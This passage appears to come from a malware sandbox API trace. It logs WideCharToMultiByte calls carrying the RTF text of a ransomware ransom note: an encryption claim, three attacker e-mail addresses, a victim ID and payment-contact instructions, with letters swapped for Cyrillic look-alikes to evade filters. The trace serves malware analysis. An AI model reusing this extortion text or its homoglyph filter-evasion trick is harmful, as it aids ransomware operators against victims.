uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 